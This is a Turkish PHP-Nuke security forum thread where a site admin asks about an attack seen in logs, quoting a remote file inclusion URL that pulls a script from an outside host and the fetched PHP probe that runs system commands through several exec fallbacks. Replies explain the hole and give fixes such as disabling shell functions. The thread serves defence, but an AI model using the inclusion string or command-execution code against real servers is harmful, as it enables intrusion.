Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 477
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(4687 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(7895 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3284 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(9597 okuma, 10 yanıt)
 Nuke Sentinel..
(4329 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(4859 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(3409 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(9933 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(9163 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(5121 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(40515 okuma, 45 yanıt)
 Bu bir saldırmı..
(8053 okuma, 7 yanıt)
 siteme virüs girmis..
(8180 okuma, 6 yanıt)
 Sitedekileri atmak..
(5132 okuma, 2 yanıt)
 Kötü botları engellemek...
(11031 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(7095 okuma, 5 yanıt)
 index atılamayan site yap..
(6969 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(5246 okuma, 2 yanıt)
 js trojandownloader.agent..
(5681 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(7396 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(4880 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(5855 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(13679 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(26266 okuma, 25 yanıt)
 hacklendim mi?..
(5925 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(75486 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(4395 okuma, 1 yanıt)
 Site neden Google i banla..
(4134 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(6147 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(7175 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(7221 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(9666 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(6942 okuma, 5 yanıt)
 forum için kod yazma yasa..
(4859 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(4639 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(5196 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(4712 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3425 okuma, 0 yanıt)
 Protector' deki Host İs..
(3439 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(7471 okuma, 7 yanıt)
 index dosyasının chmod k..
(4013 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(3589 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(7763 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(4432 okuma, 1 yanıt)
 Nuke Güvenlik..
(157706 okuma, 257 yanıt)
 bütün index lere iframe e..
(18471 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(5644 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(23972 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(18723 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(3734 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Bu Saldırı Hakkında Bilgisi Olan varmı?
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Bu Saldırı Hakkında Bilgisi Olan varmı?

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-03-31, 02:13:37    Mesaj konusu: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Arkadaşlar çok ilginç bir saldırı gördüm.Bunu ilk defa gördüm ve acaba bir bilen varmıdır diye öğrenmek istedim

sistem:
libwww-perl/5.805

ip adres:
219.94.128.57


adres satırına;

index.php?phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyorlar...bu link ile ne gibi bir saldırı yapıldığını bilen varmı?
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-06, 17:30:45    Mesaj konusu: Forum Arası Reklamlar


Başa dön
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-03-31, 02:17:37    Mesaj konusu: Alıntıyla Cevap Gönder

uzak serverdaki php dosyası;

Kod:

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
komutan1905
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul

MesajTarih: 2008-03-31, 13:07:01    Mesaj konusu: Alıntıyla Cevap Gönder

bu shell denemesidir...ancak salak lamer becerememiş....
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
akinci313
Mesaj: 1+
Mesaj: 1+





Kayıt: Dec 29, 2003
Mesajlar: 44
Konum: çanakkale

MesajTarih: 2008-03-31, 13:07:23    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Benim anladigim kadari XSS acigi üzere shell atip root hakkina ele gecirmeye calismislar.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-03-31, 14:30:37    Mesaj konusu: Alıntıyla Cevap Gönder

polibo sunucunda tehlikeli fonksiyonlar aktif onları devre dışı bırakırsan sorun yaşamazsın başta shell_exec olmak üzere
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
DiRect
Mesaj: 200+
Mesaj: 200+





Kayıt: Jun 24, 2006
Mesajlar: 210

MesajTarih: 2008-03-31, 18:12:36    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

c-99 attack olarak da geçiyo sanırım bu olay, uzak sunucudan dosya çekip sitene bırakıyorlar shell atma olarak. Sonra istedikleri gibi sitende gezebiliyorlar index atabiliyorlar.

Dosyalarını incele içlerinde herhangi göze çarpan bir kod parçacığı var mı? Belkide bırakmışlardır ve saldırıya açıktır.

Sitene shell bırakılıyorsa (bırakılmışsa) hostun fonkiyonlarından olabilir amanav arkadaşın dediği gibi. Gerekirse host firması bile değiştirilebilir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Sercan
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 07, 2006
Mesajlar: 1719
Konum: İstanbuL //

MesajTarih: 2008-03-31, 20:31:47    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

DiRect :
c-99 attack olarak da geçiyo sanırım bu olay, uzak sunucudan dosya çekip sitene bırakıyorlar shell atma olarak. Sonra istedikleri gibi sitende gezebiliyorlar index atabiliyorlar.

Dosyalarını incele içlerinde herhangi göze çarpan bir kod parçacığı var mı? Belkide bırakmışlardır ve saldırıya açıktır.

Sitene shell bırakılıyorsa (bırakılmışsa) hostun fonkiyonlarından olabilir amanav arkadaşın dediği gibi. Gerekirse host firması bile değiştirilebilir.

c99 sadece bir siteye dediğin saldırıları yapar r57 ile serverındaki bir siteden diğer tüm sitelere ulaşabilirler.Sunucudaki güvenlik modu açıksa atak yapmaları rahatlaşır.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
serserialper21
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 02, 2006
Mesajlar: 1660
Konum: Diyarbakır

MesajTarih: 2008-03-31, 22:21:39    Mesaj konusu: Alıntıyla Cevap Gönder

bu arada belirtmek isterım ki shell ile sadece uzak sunucudan c99 scripti ile saldırmayadabılır ki sende oyle yapmıs da fakat bunun dahilinde scripti upload ederek te çalıştırabılır

Server'in safe mod'unu devre dışı bıraktırabılırsenız script çalışmayacaktır bildiğim kadarı ile...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger MSN Messenger
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2024-05-06, 17:30:45    Mesaj konusu: Forum Arası Reklamlar


Başa dön
seyranli
Mesaj: 1000+
Mesaj: 1000+





Kayıt: May 16, 2005
Mesajlar: 3511
Konum: oradan

MesajTarih: 2008-03-31, 22:26:20    Mesaj konusu: Alıntıyla Cevap Gönder

safe mod on olsa dahi çalışan çeşitleri var bu r57 dosyalarının. açığın sebebini söyleyim size.

adres satırında
phpBB_root_path=http://stmikx.freehoxt.com/Sekip/id.txt?

yazıyor, phpbb_root_path değişkeninni tnaımlıyor, aşağıda

include($phpbb_root_path.'ayar.php');

gibi satırlar var. bu durum da diğer siteden shell içeriğini alıyor, böylece sunucunuz da değişiklik yapabilme hakkına ulaşıyor. google da shell bypass yazarsanız karşıt önlemlerini görürsünüz. kısıtlanması gereken fonksiyonlar var. peki açığı nasıl kapatırım diyorsanız, include satırından önce
$phpbb_root_path='';

eklemeniz yeterli. ben burda boş oalrak atadım, siz diğer sayfalara bakarak doğru olanını eklerseniz böyle bir sorun kalmaz
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
polibo06
Site Yöneticisi
Site Yöneticisi





Kayıt: Nov 01, 2006
Mesajlar: 2412
Konum: izmirimi özledim

MesajTarih: 2008-04-01, 13:55:04    Mesaj konusu: Alıntıyla Cevap Gönder

herkese teşekür ederim umduğumdan bile fazla bilgi vermişsiniz çok teşekürler...ilk önce bu saldırı yemedi..

serverıma güvenim sonsuzdur...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
amanav
Mesaj: 500+
Mesaj: 500+





Kayıt: Dec 08, 2002
Mesajlar: 928
Konum: Viyana

MesajTarih: 2008-04-01, 15:43:03    Mesaj konusu: Alıntıyla Cevap Gönder

polibo06 :
herkese teşekür ederim umduğumdan bile fazla bilgi vermişsiniz çok teşekürler...ilk önce bu saldırı yemedi..

serverıma güvenim sonsuzdur...


sunucya güvenmek farklı güvende tutmak farklıdır...
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
komutan1905
Mesaj: 500+
Mesaj: 500+





Kayıt: Sep 26, 2005
Mesajlar: 534
Konum: istanbul

MesajTarih: 2008-04-01, 15:49:28    Mesaj konusu: Re: Bu Saldırı Hakkında Bilgisi Olan varmı? Alıntıyla Cevap Gönder

Bence sen aşağıdaki kodları .htaccess e ekle böylece serverine her türlü resim php kod dosyalarının girmesini engeller eğer sitende avatar dosya upload varsa çakışır...


Kod:
<Files *.js ,*.php ,*.html ,*.cgi ,*.txt>
Deny From All
</Files>
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
asilimy
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Jan 25, 2007
Mesajlar: 1745
Konum: İstanbul

MesajTarih: 2008-04-06, 14:23:25    Mesaj konusu: Alıntıyla Cevap Gönder

c99 saldırısı 2 haftadır banada yapılıyor. hosting firmasına belirttim. bakalım ne olacak.. Sad
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder E-posta gönder Yazarın web sitesini ziyaret et AIM Adresi Yahoo Messenger
ulkucudiyari
Mesaj: 200+
Mesaj: 200+





Kayıt: Apr 12, 2006
Mesajlar: 213
Konum: Trabzon

MesajTarih: 2008-07-30, 04:18:59    Mesaj konusu: Alıntıyla Cevap Gönder

rootshell denemesi uzakdan shell dosyası ile kontrol
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder Yazarın web sitesini ziyaret et
Just
Mesaj: 100+
Mesaj: 100+





Kayıt: Oct 29, 2006
Mesajlar: 196
Konum: Uzak Bir Yer!

MesajTarih: 2008-07-30, 12:15:28    Mesaj konusu: Alıntıyla Cevap Gönder

Root girişi yaparak

php.ini de disable_functions satırını bulun ve yanına

Kod:
glob,hopenbasedir,f_open,system,dl,passthr u,cat,exec,popen,proc_close,proc_get_status,proc_n ice,proc_open,escapeshellcmd,escapeshellarg,show_s ource,posix_mkfifo,mysql_list_dbs,get_current_user ,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alt er,parse_ini_file,leak,apache_child_terminate,posi x_kill,posix_setpgid,posix_setsid,posix_setuid,pro c_terminate,syslog,fpassthru,stream_select,socket_ select,socket_create,socket_create_listen,socket_c reate_pair,socket_listen,socket_accept,socket_bind ,socket_strerror,pcntl_fork,pcntl_signal,pcntl_wai tpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsi gnaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wterm sig,openlog,apache_get_modules,apache_get_version, apache_getenv,apache_note,apache_setenv,virtual

bu komutu ekleyin. Safe mode gerekmedikçe "on" konumunda kalsın.

Very Happy
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Sınırsız Trafik Satan Hosting Varmı hidalgo27 Domain Pazarı 0 2010-07-03, 23:15:33 Son Mesajı Görüntüle
Yeni mesaj yok Musıc Box elinde olan varmı cuneytsonmez Php Nuke Modülleri 2 2010-07-01, 08:54:15 Son Mesajı Görüntüle
Yeni mesaj yok weadam host kullanan varmı? eynesilcom Linux Genel 2 2010-06-30, 04:00:18 Son Mesajı Görüntüle
Yeni mesaj yok emlak sitesi hakkında Miralay33 Php Nuke Sorunlarınız 7 2010-06-28, 14:31:26 Son Mesajı Görüntüle
Yeni mesaj yok tema hakkında yardım temhem Php Nuke Tema Paylaşımları 5 2010-06-24, 21:34:21 Son Mesajı Görüntüle

Copyright © 2002-2024 Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright